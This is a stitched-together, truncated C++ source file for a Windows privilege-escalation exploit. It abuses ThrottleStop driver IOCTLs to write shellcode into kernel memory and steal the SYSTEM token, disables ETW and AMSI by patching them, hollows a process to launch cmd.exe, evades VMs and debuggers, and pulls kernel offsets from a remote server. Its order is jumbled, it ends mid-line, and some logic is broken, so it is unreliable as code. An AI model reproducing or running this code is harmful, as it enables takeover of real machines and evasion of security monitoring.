IOCTL_PHYS_MEMORY Input = { 0 }; Input.PhysicalAddress = PhysicalAddress; Input.Buffer = Buffer; Input.Size = Size; ULONG IoctlCode = 0; switch (Version) { case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ; break; case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ; break; case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ; break; case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ; break; case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ; break; default: return FALSE; } BOOL result = DeviceIoControl( hDevice, IoctlCode, &Input, sizeof(Input), &Input, sizeof(Input), &dwBytesReturned, NULL ); if (!result || dwBytesReturned != Size) { return false; } return true; } bool WritePhysicalMemoryImproved(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { if (!hDevice || !Buffer || Size == 0) { return false; } DWORD dwBytesReturned = 0; IOCTL_PHYS_MEMORY Input = { 0 }; Input.PhysicalAddress = PhysicalAddress; Input.Buffer = Buffer; Input.Size = Size; ULONG IoctlCode = 0; switch (Version) { case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_WRITE; break; case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_WRITE; break; case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_WRITE; break; case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_WRITE; break; case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_WRITE; break; default: return FALSE; } BOOL result = DeviceIoControl( hDevice, IoctlCode, &Input, sizeof(Input), &Input, sizeof(Input), &dwBytesReturned, NULL ); if (!result || dwBytesReturned != Size) { return false; } return true; } bool ReadPhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { const SIZE_T CHUNK_SIZE = 4096; for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) { SIZE_T chunkSize = std::min(CHUNK_SIZE, Size - offset); if (!ReadPhysicalMemoryImproved( hDevice, PhysicalAddress + offset, (PVOID)((ULONG_PTR)Buffer + offset), chunkSize, Version )) { return false; } RandomSleep(); } return true; } bool WritePhysicalMemorySafe(HANDLE hDevice, ULONG64 PhysicalAddress, PVOID Buffer, SIZE_T Size, ULONG Version) { const SIZE_T CHUNK_SIZE = 4096; for (SIZE_T offset = 0; offset < Size; offset += CHUNK_SIZE) { SIZE_T chunkSize = std::min(CHUNK_SIZE, Size - offset); if (!WritePhysicalMemoryImproved( hDevice, PhysicalAddress + offset, (PVOID)((ULONG_PTR)Buffer + offset), chunkSize, Version )) { return false; } RandomSleep(); } return true; } PVOID GetKernelBase() { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded)) { nDrivers = cbNeeded / sizeof(drivers[0]); for (int i = 0; i < nDrivers; i++) { CHAR szDriver[1024]; if (GetDeviceDriverBaseNameA(drivers[i], szDriver, sizeof(szDriver))) { if (strcmp(szDriver, "ntoskrnl.exe") == 0) { return drivers[i]; } } } } return NULL; } DWORD GetWindowsVersion() { if (g_dwWindowsVersion != 0) { return g_dwWindowsVersion; } static pRtlGetVersion RtlGetVersionPtr = NULL; if (!RtlGetVersionPtr) { RtlGetVersionPtr = (pRtlGetVersion)GetProcAddress( GetModuleHandleA("ntdll.dll"), "RtlGetVersion"); } if (RtlGetVersionPtr) { RTL_OSVERSIONINFOW osvi = { 0 }; osvi.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW); if (RtlGetVersionPtr(&osvi) == 0) { g_dwWindowsVersion = (osvi.dwMajorVersion << 24) | (osvi.dwMinorVersion << 16) | osvi.dwBuildNumber; return g_dwWindowsVersion; } } return 0; } bool DiscoverKernelOffsets(SHELLCODE_METADATA* metadata) { PVOID kernelBase = GetKernelBase(); if (!kernelBase) { return false; } PVOID psInitialSystemProcess = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation"); if (!psInitialSystemProcess) { return false; } PVOID kernelPsInitialSystemProcess = (PVOID)((ULONG_PTR)kernelBase + (ULONG_PTR)psInitialSystemProcess - (ULONG_PTR)GetModuleHandleA("ntdll.dll")); HANDLE hDevice = GetThrottleStopDeviceHandleImproved(); if (!hDevice) { return false; } ULONG64 systemProcessAddr = 0; for (ULONG version = 1; version <= 5; version++) { if (ReadPhysicalMemoryImproved(hDevice, (ULONG64)kernelPsInitialSystemProcess, &systemProcessAddr, sizeof(systemProcessAddr), version)) { break; } } if (systemProcessAddr == 0) { CloseHandle(hDevice); return false; } for (ULONG64 offset = 0; offset < 0x1000; offset += 8) { ULONG64 value = 0; if (ReadPhysicalMemoryImproved(hDevice, systemProcessAddr + offset, &value, sizeof(value), 1)) { if (value == SYSTEM_PID) { metadata->UniqueProcessIdOffset = offset; break; } } } if (metadata->UniqueProcessIdOffset == 0) { CloseHandle(hDevice); return false; } DWORD windowsVersion = GetWindowsVersion(); DWORD majorVersion = (windowsVersion >> 24) & 0xFF; DWORD minorVersion = (windowsVersion >> 16) & 0xFF; if (majorVersion == 10 && minorVersion == 0) { metadata->TokenOffset = 0x4b8; metadata->ActiveProcessLinksOffset = 0x448; metadata->EPROCESS_Size = 0x8d0; metadata->KTHREAD_Offset = 0x188; metadata->EPROCESS_Offset = 0x220; } else if (majorVersion == 6 && minorVersion >= 1 && minorVersion <= 3) { metadata->TokenOffset = 0x348; metadata->ActiveProcessLinksOffset = 0x188; metadata->EPROCESS_Size = 0x6c0; metadata->KTHREAD_Offset = 0x188; metadata->EPROCESS_Offset = 0x220; } else if (majorVersion == 6 && minorVersion == 0) { metadata->TokenOffset = 0x320; metadata->ActiveProcessLinksOffset = 0x160; metadata->EPROCESS_Size = 0x5d0; metadata->KTHREAD_Offset = 0x188; metadata->EPROCESS_Offset = 0x220; } else if (majorVersion == 5 && minorVersion >= 1 && minorVersion <= 2) { metadata->TokenOffset = 0x1c0; metadata->ActiveProcessLinksOffset = 0x98; metadata->EPROCESS_Size = 0x3c0; metadata->KTHREAD_Offset = 0x188; metadata->EPROCESS_Offset = 0x220; } else { metadata->TokenOffset = 0x4b8; metadata->ActiveProcessLinksOffset = 0x448; metadata->EPROCESS_Size = 0x8d0; metadata->KTHREAD_Offset = 0x188; metadata->EPROCESS_Offset = 0x220; } CloseHandle(hDevice); return true; } bool UpdateOffsetsFromRemote(SHELLCODE_METADATA* metadata) { HINTERNET hInternet = InternetOpen(L"Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); if (!hInternet) { return false; } HINTERNET hConnect = InternetConnect(hInternet, L"example.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); if (!hConnect) { InternetCloseHandle(hInternet); return false; } DWORD windowsVersion = GetWindowsVersion(); wchar_t url[256]; swprintf_s(url, sizeof(url)/sizeof(wchar_t), L"/api/offsets/%08X.json", windowsVersion); HINTERNET hRequest = HttpOpenRequest(hConnect, L"GET", url, NULL, NULL, NULL, INTERNET_FLAG_SECURE, 0); if (!hRequest) { InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); return false; } if (!HttpSendRequest(hRequest, NULL, 0, NULL, 0)) { InternetCloseHandle(hRequest); InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); return false; } CHAR buffer[4096]; DWORD bytesRead; std::string jsonData; while (InternetReadFile(hRequest, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) { jsonData.append(buffer, bytesRead); } InternetCloseHandle(hRequest); InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); if (jsonData.empty()) { return false; } char tempPath[MAX_PATH]; GetTempPathA(MAX_PATH, tempPath); char offsetFilePath[MAX_PATH]; sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion); std::ofstream outFile(offsetFilePath, std::ios::binary); if (outFile) { outFile.write(jsonData.c_str(), jsonData.size()); outFile.close(); std::ifstream inFile(offsetFilePath, std::ios::binary); if (inFile) { inFile.read(reinterpret_cast(metadata), sizeof(SHELLCODE_METADATA)); inFile.close(); return true; } } return false; } bool GetKernelOffsetsImproved(SHELLCODE_METADATA* metadata) { char tempPath[MAX_PATH]; GetTempPathA(MAX_PATH, tempPath); DWORD windowsVersion = GetWindowsVersion(); char offsetFilePath[MAX_PATH]; sprintf_s(offsetFilePath, "%s\\offsets_%08X.dat", tempPath, windowsVersion); std::ifstream inFile(offsetFilePath, std::ios::binary); if (inFile) { inFile.read(reinterpret_cast(metadata), sizeof(SHELLCODE_METADATA)); inFile.close(); return true; } if (UpdateOffsetsFromRemote(metadata)) { std::ifstream inFile(offsetFilePath, std::ios::binary); if (inFile) { inFile.read(reinterpret_cast(metadata), sizeof(SHELLCODE_METADATA)); inFile.close(); return true; } } return DiscoverKernelOffsets(metadata); } void AddPrologue(std::vector& shellcode) { std::vector junkInstructions = { 0x90, 0x90, 0x90, 0x48, 0x31, 0xC0, 0x48, 0x31, 0xDB, 0x48, 0x31, 0xC9, 0x48, 0x31, 0xD2 }; std::shuffle(junkInstructions.begin(), junkInstructions.end(), gen); for (size_t i = 0; i < 5; i++) { shellcode.push_back(junkInstructions[i]); } BYTE prologue[] = { 0x48, 0x31, 0xC0, 0x65, 0x48, 0x8B, 0x60, 0x18 }; shellcode.insert(shellcode.end(), prologue, prologue + sizeof(prologue)); } void AddGetCurrentProcess(std::vector& shellcode) { BYTE getCurrentProcess[] = { 0x48, 0x8B, 0xB0, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x76, 0x40 }; shellcode.insert(shellcode.end(), getCurrentProcess, getCurrentProcess + sizeof(getCurrentProcess)); } void AddFindSystemProcess(std::vector& shellcode, SHELLCODE_METADATA* metadata) { BYTE activeProcessLinksOffset = (BYTE)(metadata->ActiveProcessLinksOffset - 8); BYTE findSystemProcess[] = { 0x48, 0x8B, 0x5E, activeProcessLinksOffset, 0x48, 0x8B, 0x1B, 0x48, 0x83, 0xFB, 0x04, 0x75, 0xF0 }; shellcode.insert(shellcode.end(), findSystemProcess, findSystemProcess + sizeof(findSystemProcess)); } void AddCopyToken(std::vector& shellcode, SHELLCODE_METADATA* metadata) { BYTE tokenOffset = (BYTE)(metadata->TokenOffset - 8); BYTE copyToken[] = { 0x48, 0x8B, 0x5B, tokenOffset, 0x48, 0x8B, 0x43, 0x70, 0x48, 0x89, 0x43, 0x70 }; shellcode.insert(shellcode.end(), copyToken, copyToken + sizeof(copyToken)); } void AddEpilogue(std::vector& shellcode) { BYTE epilogue[] = { 0xC3 }; shellcode.insert(shellcode.end(), epilogue, epilogue + sizeof(epilogue)); } void EncryptShellcode(std::vector& shellcode, int layer) { DWORD key = GetTickCount() & 0xFF; for (size_t i = 0; i < shellcode.size(); i++) { shellcode[i] ^= (key + i + layer) & 0xFF; } } bool BuildTrulyDynamicShellcode(BYTE** shellcode, SIZE_T* shellcodeSize, SHELLCODE_METADATA* metadata) { std::vector generatedShellcode; AddPrologue(generatedShellcode); AddGetCurrentProcess(generatedShellcode); AddFindSystemProcess(generatedShellcode, metadata); AddCopyToken(generatedShellcode, metadata); AddEpilogue(generatedShellcode); for (int layer = 0; layer < 3; layer++) { EncryptShellcode(generatedShellcode, layer); } *shellcodeSize = generatedShellcode.size(); *shellcode = (BYTE*)malloc(*shellcodeSize); if (!*shellcode) { return false; } memcpy(*shellcode, generatedShellcode.data(), *shellcodeSize); return true; } ULONG64 GetPhysicalAddressAccurate(PVOID VirtualAddress) { HANDLE hDevice = GetThrottleStopDeviceHandleImproved(); if (!hDevice) { return 0; } PVOID kernelBase = GetKernelBase(); if (!kernelBase) { CloseHandle(hDevice); return 0; } ULONG64 offset = (ULONG64)VirtualAddress - (ULONG_PTR)kernelBase; ULONG64 physicalAddress = 0; DWORD dwBytesReturned = 0; typedef struct _VIRTUAL_TO_PHYSICAL { PVOID VirtualAddress; ULONG64 PhysicalAddress; } VIRTUAL_TO_PHYSICAL, *PVIRTUAL_TO_PHYSICAL; VIRTUAL_TO_PHYSICAL v2p = { 0 }; v2p.VirtualAddress = VirtualAddress; for (ULONG version = 1; version <= 5; version++) { ULONG IoctlCode = 0; switch (version) { case 1: IoctlCode = IOCTL_THROTTLESTOP_V1_READ + 0x10; break; case 2: IoctlCode = IOCTL_THROTTLESTOP_V2_READ + 0x10; break; case 3: IoctlCode = IOCTL_THROTTLESTOP_V3_READ + 0x10; break; case 4: IoctlCode = IOCTL_THROTTLESTOP_V4_READ + 0x10; break; case 5: IoctlCode = IOCTL_THROTTLESTOP_V5_READ + 0x10; break; default: continue; } if (DeviceIoControl( hDevice, IoctlCode, &v2p, sizeof(v2p), &v2p, sizeof(v2p), &dwBytesReturned, NULL )) { physicalAddress = v2p.PhysicalAddress; break; } } CloseHandle(hDevice); return physicalAddress; } bool PatchKernelForPrivilegeEscalationSafe(HANDLE hDevice, ULONG DriverVersion) { PVOID KernelBase = GetKernelBase(); if (!KernelBase) { return false; } SHELLCODE_METADATA metadata = { 0 }; if (!GetKernelOffsetsImproved(&metadata)) { return false; } BYTE* shellcode = NULL; SIZE_T shellcodeSize = 0; if (!BuildTrulyDynamicShellcode(&shellcode, &shellcodeSize, &metadata)) { return false; } PVOID targetFunction = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx"); if (!targetFunction) { free(shellcode); return false; } PVOID kernelFunction = (PVOID)((ULONG_PTR)KernelBase + (ULONG_PTR)targetFunction - (ULONG_PTR)GetModuleHandleA("ntdll.dll")); ULONG64 physicalAddress = GetPhysicalAddressAccurate(kernelFunction); if (!physicalAddress) { free(shellcode); return false; } std::vector originalBytes(shellcodeSize); if (!ReadPhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion)) { free(shellcode); return false; } for (SIZE_T i = 0; i < shellcodeSize; i++) { shellcode[i] ^= 0xAA; } __try { if (!WritePhysicalMemorySafe(hDevice, physicalAddress, shellcode, shellcodeSize, DriverVersion)) { __leave; } HANDLE hThread = NULL; static pNtCreateThreadEx NtCreateThreadExPtr = NULL; if (!NtCreateThreadExPtr) { NtCreateThreadExPtr = (pNtCreateThreadEx)GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx"); } if (NtCreateThreadExPtr) { NTSTATUS status = NtCreateThreadExPtr( &hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)kernelFunction, NULL, FALSE, 0, 0, 0, NULL ); if (!NT_SUCCESS(status)) { hThread = NULL; } } if (!hThread) { hThread = CreateRemoteThread( GetCurrentProcess(), NULL, 0, (LPTHREAD_START_ROUTINE)kernelFunction, NULL, 0, NULL ); } if (hThread) { WaitForSingleObject(hThread, 5000); CloseHandle(hThread); } } __finally { WritePhysicalMemorySafe(hDevice, physicalAddress, originalBytes.data(), originalBytes.size(), DriverVersion); } free(shellcode); return true; } bool DisableETWWithEncryptedAPIs() { ENCRYPTED_API encApi = { { 0x6E, 0x6F, 0x6C, 0x6C, 0x64, 0x2E, 0x64, 0x6C, 0x6C }, { 0x45, 0x74, 0x77, 0x45, 0x76, 0x65, 0x6E, 0x74, 0x57, 0x72, 0x69, 0x74, 0x65 }, 0xAA }; PVOID EtwEventWriteAddress = GetEncryptedProcAddress(&encApi); if (!EtwEventWriteAddress) { return false; } DWORD oldProtect; if (!VirtualProtect(EtwEventWriteAddress, 1, PAGE_EXECUTE_READWRITE, &oldProtect)) { return false; } *(BYTE*)EtwEventWriteAddress = 0xC3; VirtualProtect(EtwEventWriteAddress, 1, oldProtect, &oldProtect); return true; } bool DisableAMSIWithEncryptedAPIs() { ENCRYPTED_API encApi = { { 0x61, 0x6D, 0x73, 0x69, 0x2E, 0x64, 0x6C, 0x6C }, { 0x41, 0x6D, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6E, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72 }, 0xAA }; PVOID AmsiScanBufferAddress = GetEncryptedProcAddress(&encApi); if (!AmsiScanBufferAddress) { return false; } DWORD oldProtect; if (!VirtualProtect(AmsiScanBufferAddress, 6, PAGE_EXECUTE_READWRITE, &oldProtect)) { return false; } BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; memcpy(AmsiScanBufferAddress, patch, sizeof(patch)); VirtualProtect(AmsiScanBufferAddress, 6, oldProtect, &oldProtect); return true; } bool StealSystemToken() { HANDLE hSystemProcess = NULL; HANDLE hToken = NULL; HANDLE hNewToken = NULL; DWORD dwPID = SYSTEM_PID; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return false; } PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hSnapshot, &pe32)) { do { if (pe32.th32ProcessID == dwPID) { hSystemProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); break; } } while (Process32Next(hSnapshot, &pe32)); } CloseHandle(hSnapshot); if (!hSystemProcess) { return false; } if (!OpenProcessToken(hSystemProcess, TOKEN_DUPLICATE, &hToken)) { CloseHandle(hSystemProcess); return false; } if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) { CloseHandle(hToken); CloseHandle(hSystemProcess); return false; } if (!ImpersonateLoggedOnUser(hNewToken)) { CloseHandle(hToken); CloseHandle(hNewToken); CloseHandle(hSystemProcess); return false; } CloseHandle(hToken); CloseHandle(hNewToken); CloseHandle(hSystemProcess); return true; } bool CreateProcessWithHollowing(const wchar_t* targetPath, const wchar_t* cmdLine) { STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); if (!CreateProcess( targetPath, (LPWSTR)cmdLine, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi )) { return false; } CONTEXT context; context.ContextFlags = CONTEXT_FULL; if (!GetThreadContext(pi.hThread, &context)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL; if (!NtQueryInformationProcessPtr) { NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess"); } if (!NtQueryInformationProcessPtr) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PROCESS_BASIC_INFORMATION pbiInfo; NTSTATUS status = NtQueryInformationProcessPtr( pi.hProcess, ProcessBasicInformation, &pbiInfo, sizeof(pbiInfo), NULL ); if (!NT_SUCCESS(status)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PEB peb; if (!ReadProcessMemory(pi.hProcess, pbiInfo.PebBaseAddress, &peb, sizeof(peb), NULL)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PVOID imageBase = peb.ImageBaseAddress; IMAGE_DOS_HEADER dosHeader; if (!ReadProcessMemory(pi.hProcess, imageBase, &dosHeader, sizeof(dosHeader), NULL) || dosHeader.e_magic != IMAGE_DOS_SIGNATURE) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } IMAGE_NT_HEADERS ntHeaders; if (!ReadProcessMemory(pi.hProcess, (PVOID)((ULONG_PTR)imageBase + dosHeader.e_lfanew), &ntHeaders, sizeof(ntHeaders), NULL) || ntHeaders.Signature != IMAGE_NT_SIGNATURE) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } if (!VirtualFreeEx(pi.hProcess, imageBase, 0, MEM_RELEASE)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PVOID newImageBase = VirtualAllocEx(pi.hProcess, imageBase, ntHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!newImageBase) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } HANDLE hFile = CreateFile(targetPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } DWORD fileSize = GetFileSize(hFile, NULL); BYTE* fileData = (BYTE*)malloc(fileSize); if (!fileData) { CloseHandle(hFile); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } DWORD bytesRead; if (!ReadFile(hFile, fileData, fileSize, &bytesRead, NULL) || bytesRead != fileSize) { free(fileData); CloseHandle(hFile); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } CloseHandle(hFile); if (!WriteProcessMemory(pi.hProcess, newImageBase, fileData, ntHeaders.OptionalHeader.SizeOfHeaders, NULL)) { free(fileData); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(&ntHeaders); for (WORD i = 0; i < ntHeaders.FileHeader.NumberOfSections; i++) { PVOID sectionDest = (PVOID)((ULONG_PTR)newImageBase + sectionHeader[i].VirtualAddress); PVOID sectionSrc = (PVOID)((ULONG_PTR)fileData + sectionHeader[i].PointerToRawData); if (!WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader[i].SizeOfRawData, NULL)) { free(fileData); TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } } free(fileData); context.Rcx = (ULONG_PTR)newImageBase + ntHeaders.OptionalHeader.AddressOfEntryPoint; if (!SetThreadContext(pi.hThread, &context)) { TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return false; } ResumeThread(pi.hThread); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return true; } void LoadDefaultConfig(EXPLOIT_CONFIG* config) { wcscpy_s(config->TargetProcess, MAX_PATH, L"C:\\Windows\\System32\\cmd.exe"); wcscpy_s(config->CommandLine, MAX_PATH, L""); config->CreationFlags = CREATE_NEW_CONSOLE; config->UseStealthMode = TRUE; config->DisableETW = TRUE; config->DisableAMSI = TRUE; config->MaxRetries = 3; config->RandomSleepMin = 50; config->RandomSleepMax = 200; } void RandomSleepConfigurable(const EXPLOIT_CONFIG* config) { if (!config->UseStealthMode) return; std::uniform_int_distribution<> dis(config->RandomSleepMin, config->RandomSleepMax); Sleep(dis(gen)); } int main(int argc, char* argv[]) { EXPLOIT_CONFIG config; LoadDefaultConfig(&config); if (argc > 1) { wchar_t configFilePath[MAX_PATH]; size_t convertedChars; mbstowcs_s(&convertedChars, configFilePath, MAX_PATH, argv[1], _TRUNCATE); } g_bStealthMode = config.UseStealthMode; if (IsRunningInVMAdvanced() || IsDebuggerPresentAdvanced()) { return 0; } g_dwWindowsVersion = GetWindowsVersion(); if (config.DisableETW) { DisableETWWithEncryptedAPIs(); } if (config.DisableAMSI) { DisableAMSIWithEncryptedAPIs(); } HANDLE hDevice = GetThrottleStopDeviceHandleImproved(); if (!hDevice) { return 1; } bool success = false; for (ULONG version = 1; version <= 5 && !success; version++) { for (DWORD retry = 0; retry < config.MaxRetries && !success; retry++) { RandomSleepConfigurable(&config); if (PatchKernelForPrivilegeEscalationSafe(hDevice, version)) { success = true; } } } CloseHandle(hDevice); if (!success) { return 1; } if (!StealSystemToken()) { return 1; } if (!CreateProcessWithHollowing(config.TargetProcess, config.CommandLine)) { return 1; } return 0; } ULONG64 ActiveProcessLinksOffset; ULONG64 EPROCESS_Size; ULONG64 KTHREAD_Offset; ULONG64 EPROCESS_Offset; } SHELLCODE_METADATA, *PSHELLCODE_METADATA; typedef struct _EXPLOIT_CONFIG { wchar_t TargetProcess[MAX_PATH]; wchar_t CommandLine[MAX_PATH]; DWORD CreationFlags; BOOL UseStealthMode; BOOL DisableETW; BOOL DisableAMSI; DWORD MaxRetries; DWORD RandomSleepMin; DWORD RandomSleepMax; } EXPLOIT_CONFIG, *PEXPLOIT_CONFIG; typedef struct _ENCRYPTED_STRING { BYTE Data[256]; SIZE_T Length; DWORD Key; } ENCRYPTED_STRING, *PENCRYPTED_STRING; typedef struct _ENCRYPTED_API { char ModuleName[64]; char FunctionName[128]; DWORD Key; } ENCRYPTED_API, *PENCRYPTED_API; std::random_device rd; std::mt19937 gen(rd()); bool g_bStealthMode = true; DWORD g_dwWindowsVersion = 0; typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typedef NTSTATUS(NTAPI* pNtCreateThreadEx)( PHANDLE hThread, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, BOOL CreateSuspended, ULONG StackZeroBits, ULONG SizeOfStackCommit, ULONG SizeOfStackReserve, LPVOID lpBytesBuffer ); typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength ); typedef NTSTATUS(NTAPI* pRtlGetVersion)(PRTL_OSVERSIONINFOW); void RandomSleep() { if (!g_bStealthMode) return; std::uniform_int_distribution<> dis(50, 200); Sleep(dis(gen)); } bool IsRunningInVMAdvanced() { if (!g_bStealthMode) return false; int cpuInfo[4]; __cpuid(cpuInfo, 0x1); if ((cpuInfo[2] & (1 << 31)) != 0) { return true; } __try { BYTE invept[] = { 0x66, 0x0F, 0x38, 0x80, 0x00, 0x00, 0x00, 0x00 }; void (*invept_func)() = (void(*)())invept; invept_func(); } __except(EXCEPTION_EXECUTE_HANDLER) { return true; } HKEY hKey; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { WCHAR szValue[256]; DWORD dwSize = sizeof(szValue); if (RegQueryValueEx(hKey, L"SystemBiosVersion", NULL, NULL, (LPBYTE)szValue, &dwSize) == ERROR_SUCCESS) { if (wcsstr(szValue, L"VMware") || wcsstr(szValue, L"VirtualBox") || wcsstr(szValue, L"Hyper-V")) { RegCloseKey(hKey); return true; } } RegCloseKey(hKey); } HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot != INVALID_HANDLE_VALUE) { PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hSnapshot, &pe32)) { do { if (_wcsicmp(pe32.szExeFile, L"vmtoolsd.exe") == 0 || _wcsicmp(pe32.szExeFile, L"VBoxService.exe") == 0 || _wcsicmp(pe32.szExeFile, L"vmware.exe") == 0) { CloseHandle(hSnapshot); return true; } } while (Process32Next(hSnapshot, &pe32)); } CloseHandle(hSnapshot); } return false; } bool IsDebuggerPresentAdvanced() { if (!g_bStealthMode) return false; if (::IsDebuggerPresent()) { return true; } static pNtQueryInformationProcess NtQueryInformationProcessPtr = NULL; if (!NtQueryInformationProcessPtr) { NtQueryInformationProcessPtr = (pNtQueryInformationProcess)GetProcAddress( GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess"); } if (NtQueryInformationProcessPtr) { PVOID debugPort = NULL; NTSTATUS status = NtQueryInformationProcessPtr( GetCurrentProcess(), (PROCESSINFOCLASS)7, &debugPort, sizeof(debugPort), NULL ); if (NT_SUCCESS(status) && debugPort != NULL) { return true; } } if (NtQueryInformationProcessPtr) { ULONG debugFlags = 0; NTSTATUS status = NtQueryInformationProcessPtr( GetCurrentProcess(), (PROCESSINFOCLASS)0x1F, &debugFlags, sizeof(debugFlags), NULL ); if (NT_SUCCESS(status) && debugFlags == 0) { return true; } } if (NtQueryInformationProcessPtr) { HANDLE debugObjectHandle = NULL; NTSTATUS status = NtQueryInformationProcessPtr( GetCurrentProcess(), (PROCESSINFOCLASS)0x1E, &debugObjectHandle, sizeof(debugObjectHandle), NULL ); if (NT_SUCCESS(status) && debugObjectHandle != NULL) { return true; } } __try { __debugbreak(); return false; } __except(EXCEPTION_EXECUTE_HANDLER) { return true; } LARGE_INTEGER frequency; LARGE_INTEGER start, end; QueryPerformanceFrequency(&frequency); QueryPerformanceCounter(&start); volatile int sum = 0; for (int i = 0; i < 1000; i++) { sum += i; } QueryPerformanceCounter(&end); double elapsed = (end.QuadPart - start.QuadPart) * 1000.0 / frequency.QuadPart; if (elapsed > 0.5) { return true; } __try { __asm { int 3 } return false; } __except(EXCEPTION_EXECUTE_HANDLER) { return true; } return false; } void AdvancedObfuscateString(char* str, size_t len) { if (!g_bStealthMode) return; DWORD key1 = GetTickCount() & 0xFF; for (size_t i = 0; i < len; i++) { str[i] ^= (key1 + i) & 0xFF; } for (size_t i = 0; i < len; i++) { if (str[i] == 'T') str[i] = '\x54'; else if (str[i] == 'h') str[i] = '\x68'; else if (str[i] == 'r') str[i] = '\x72'; else if (str[i] == 'o') str[i] = '\x6F'; else if (str[i] == 't') str[i] = '\x74'; else if (str[i] == 'l') str[i] = '\x6C'; else if (str[i] == 'e') str[i] = '\x65'; else if (str[i] == 'S') str[i] = '\x53'; else if (str[i] == 'p') str[i] 